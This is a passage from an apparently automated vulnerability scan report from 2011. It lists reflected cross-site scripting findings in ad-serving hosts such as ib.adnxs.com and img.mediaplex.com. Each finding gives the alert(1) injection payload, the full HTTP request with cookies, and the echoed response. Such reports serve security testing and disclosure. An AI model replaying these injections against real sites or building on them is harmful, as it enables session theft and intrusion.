Set-Cookie: anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:55:52 GMT
Content-Length: 1077

document.write('<a href="http://ib.adnxs.com/click/AAAAAAAACEAAAAAAAAAIQAAAAGBmZgJArkfhehSuCkCuR-F6FK4KQAqCdmWvEgIiBWHfHSmrEEKBi1hNAAAAAAQRAQC1AAAANQEAAAIAAACDaAIA0WMAAAEAAABVU0QAVVNEAKAAWALcANADyAUBAgUCAAIAAAAAuxe_kgAAAAA./cnd=!6BUqYQjsLBCD0QkYACDRxwEo0AcxmZmZcRSuCkBCEwgAEAAYACABKP7__________wFIAFAAWNwBYABotQI.6857d'-alert(1)-'6832ddace00/referrer=http%3A%2F%2Fwww.drudgereport.com%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBsgOVgYtYTfLXFs_xlAf3wrmbC-_675oCl5_7xBrXgo-PDAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIB
...[SNIP]...

1.177. http://ib.adnxs.com/ab [custom_macro parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the custom_macro request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e306'%3balert(1)//5bb5c06a74 was submitted in the custom_macro parameter. This input was echoed as 7e306';alert(1)//5bb5c06a74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=ZmZmZmZmAEBaIEHxY8z8PwAAAKCZmQFAWiBB8WPM_D9mZmZmZmYAQHC0hOKKmnRfBWHfHSmrEELBj1hNAAAAAK-aAwBlAQAAZAEAAAIAAAALtgIAPWQAAAEAAABVU0QAVVNEAKAAWAJXG-MECAkBAgUCAAIAAAAATCCnlAAAAAA.&tt_code=drudgereport.com&udj=uf%28%27a%27%2C+10005%2C+1297649601%29%3Buf%28%27c%27%2C+49470%2C+1297649601%29%3Buf%28%27r%27%2C+177675%2C+1297649601%29%3Bppv%289163%2C+%276878292452198102128%27%2C+1297649601%2C+1297822401%2C+49470%2C+25661%29%3B&cnd=!9BV8Wwi-ggMQi-wKGAAgvcgBKOMJMWZmZmZmZgBAQhMIABAAGAAgASj-__________8BSABQAFjXNmAAaOQC&referrer=http://www.drudgereport.com/&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5E7BSW%5ECP_ID%5E49470%5ESEG_CODES%5E7BSW-17e306'%3balert(1)//5bb5c06a74&pp=AAABLiHxjW2aHsAUrhXeXy7HnjQEzy6mEJhGsA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0K-0oEi9BqslYpw4GThC965ufnbUW7BwJm5Gu783YwBw91KDpWzUohmJbpm2okwppa7yYI0lOlyW9fubMZ7jaRy0-IPoOVpmsh49NdEahLnmrg4ToC-HK_DZHW7Ae8cfPqIKT3MAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIsHAQChgBIAEoATD_jeLqBAoRCI54EAoYAiACKAIwoY7i6gQKEQjMeBAKGAEgASgBMIue4uoEChII_IgBEAoYASABKAEw3I3i6gQKEgi_jwEQChgBIAEoATCLjeLqBBCLnuLqBBgF; sess=1; uuid2=4760492999213801733; anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 02:14:10 GMT
Content-Length: 1488

document.write('<a href="http://ib.adnxs.com/click/5zORMa3h-z97FK5H4Xr4PwAAAKCZmQFAWiBB8WPM_D9mZmZmZmYAQHC0hOKKmnRfBWHfHSmrEELBj1hNAAAAAK-aAwBlAQAAZAEAAAIAAAALtgIAPWQAAAEAAABVU0QAVVNEAKAAWAJXG-MECAkBA
...[SNIP]...
<img src="http://xcdn.xgraph.net/17572/ae/xg.gif?type=ae&ais=ApN&pid=17572&cid=7BSW&n_cid=49470&crid=flower_vday_160x600_1999jpg&n_crid=177675&mpm=CPM&n_g=u&n_a=0&aids=7BSW-17e306';alert(1)//5bb5c06a74&n_price=1.742597&n_bust=1297649601&n=http%3A%2F%2Fdata.cmcore.com%2Fimp%3Ftid%3D17%26ci%3D90074784%26vn1%3D4.1.1%26vn2%3De4.0%26ec%3DUTF-8%26cm_mmc%3DIM_Display-_-Xgraph-_-xvday1999-_-vday%26cm_mmca1%
...[SNIP]...

1.178. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca016'%3balert(1)//5fa073185f6 was submitted in the redir parameter. This input was echoed as ca016';alert(1)//5fa073185f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ptj?member=311&inv_code=cm.dailymail&size=300x250&referrer=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.dailymail%2Fron_052010%3Bnet%3Dcm%3Bu%3D%2Ccm-8533902_1297647301%2C11d765b6a10b1b3%2Chealth%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D572356%3Bcontx%3Dhealth%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.rdst11%3Bbtg%3Dcm.rdst12%3Bbtg%3Dcm.polit_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.shop_h%3Bbtg%3Dcm.tech_h%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa5%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.af1%3Bbtg%3Dmm.ai1%3Bbtg%3Dmm.al5%3Bbtg%3Dmm.am5%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.as1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dan.51%3Bbtg%3Dan.5%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dex.49%3Bbtg%3Ddx.16%3Bbtg%3Dqc.a%3Bord%3D3412338%3Fca016'%3balert(1)//5fa073185f6 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIv48BEAoYASABKAEwi43i6gQQi43i6gQYAA..; uuid2=4760492999213801733; anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIjngQChgBIAEoATCKjuLqBAoSCL-PARAKGAEgASgBMIuN4uoEEIqO4uoEGAE.; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb79863=5_[r^208WM>bcYx_nG*.:^g+C?enc=ZmZmZmZmAECE61G4HoX9PwAAAAAAAAhAhOtRuB6F_T9mZmZmZmYAQDqrGdMotboaBWHfHSmrEEIKh1hNAAAAAMs4AwA3AQAAZAEAAAIAAACILwMAploAAAEAAABVU0QAVVNEACwB-gBYDgAAUAcBAgUCAAUAAAAAqhzHbAAAAAA.&tt_code=cm.dailymail&udj=uf%28%27a%27%2C+10005%2C+1297647370%29%3Buf%28%27c%27%2C+49470%2C+1297647370%29%3Buf%28%27r%27%2C+208776%2C+1297647370%29%3Bppv%289163%2C+%271926050977599302458%27%2C+1297647370%2C+1297820170%2C+49470%2C+23206%29%3B&cnd=!txQdIwi-ggMQiN8MGAAgprUBKAAxZmZmZmZmAEBCEwgAEAAYACABKP7__________wFIAFAAWNgcYABo5AI.&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5E7BSW%5ECP_ID%5E49470%5ESEG_CODES%5E7BSW-1; path=/; expires=Tue, 15-Feb-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mCZ#-r-!h!'HeE4TR!f?sYIm%X3Zp'bpV[vypRsrn$Z9K/W<P_ZTLv<7h(.63:>>Yf$^-@VYpnGhEl:Cu8vlI:i:B2V3rfi<wSZ4:l'jt8^l@>+J-D!CW=-L5P3V:*cp*s6J2Dm-cE(PSZ6)?.HX%HgNom6fYB5AqBM>35QZDs7IAdTV:i(Zen>alciVCDxC?5e0du@Tn2!mB9m/p):MJN/xr/?SGEu6U+H0tK(AOZTn)XlSDJOj2rk/[c2J<xD?g!Jz12S<Ls:>]w:Ml[DhVWJ2-P1shhC:7QXbK-0fJ4l(vmb#mn<(-w>85h!YrKc7GvAnY_M[TK-MHJ.k53yQv$*WQwj:$fp`yb3(dE==5Z#4!RNdfO'HPL9bHg$F]0Xd>Ku0zL#)BVcXlLTo3_OCCWhQ:W3Qt(h>3.z(qrY.gKwpFehGeYv!m*Q#xs(Q<ag5cC`d]p[x%e=mX)BjLqk05tsu%UmgWaNp$b:cIF+n03`_3=ASFI/MNbyctA0]?x4V-:Xzq!0'I1a'.Q/N8QTJK))xnNxMcwDX5>pKj=p]ww++74CZ1uUBI)2)rwmSf`90S(aG*0d+%d[5Qz[RKvWH?k.V%9jMiWo0QW:]S$ZP>%0m7qzHdJf3UzM-%DF/wBu=aWG>:/wu+aFbayBOlb0r+WF(LbE>MxDP9Vs<O^>[S6R!vz!=j?E$USn+; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 14 Feb 2011 01:36:10 GMT
Content-Length: 1187

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.dailymail/ron_052010;net=cm;u=,cm-8533902_1297647301,11d765b6a10b1b3,health,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfa
...[SNIP]...
g=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=3412338?ca016';alert(1)//5fa073185f6">
...[SNIP]...

1.179. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90d9f"%3balert(1)//d7cf6a05065 was submitted in the mpck parameter. This input was echoed as 90d9f";alert(1)//d7cf6a05065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D572158616790d9f"%3balert(1)//d7cf6a05065&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=&placementid=14302119028289014& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:15 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6686
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
e=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14302-119028-28901-4?mpt=572158616790d9f";alert(1)//d7cf6a05065\" target=\"_blank\">
...[SNIP]...

1.180. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3fb5"%3balert(1)//6fd56155f2e was submitted in the mpvc parameter. This input was echoed as e3fb5";alert(1)//6fd56155f2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=e3fb5"%3balert(1)//6fd56155f2e&placementid=14302119028289014& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:23 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6662
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
ashVars\" VALUE=\"clickTAG=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=e3fb5";alert(1)//6fd56155f2ehttp://altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&clickTag=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,7773
...[SNIP]...

1.181. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [placementid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de4ec"%3balert(1)//371d15fe709 was submitted in the placementid parameter. This input was echoed as de4ec";alert(1)//371d15fe709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=&placementid=14302119028289014de4ec"%3balert(1)//371d15fe709& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:25 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6326
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014de4ec";alert(1)//371d15fe709&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">
...[SNIP]...

1.182. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c55"%3balert(1)//4a80fa0abd1 was submitted in the mpck parameter. This input was echoed as 49c55";alert(1)//4a80fa0abd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D6707832263625275206%26fcid%3D307892%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f38018c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D21007378077849c55"%3balert(1)//4a80fa0abd1&mpt=1297647243&siteid=0&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=210073780778&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%2FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAEb3SXbnARddBWHfHSmrEEKLhlhNAAAAAI9bAwBkAAAAZAAAAAIAAABwUQIAh7wAAAEAAABVU0QAVVNEALQAlgBUAAAAxgUAAgMCAAUAAAAAShEJRQAAAAA.%2Fcnd%3D%21tBF7vwj4uwIQ8KIJGAAgh_kCKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFIAFAAWFRgA2hk%2Freferrer%3Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Fa%252Fdk.html%253Fdefaulting_ad%253Dx300f22.js%2526size_id%253D18%2526account_id%253D6005%2526site_id%253D12414%2526size%253D180x150%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000777384%252Fmnum%253D0000951470%252Fcstr%253D75633200%253D_4d58868a%252C6132271880%252C777384%255E951470%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D75633200%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
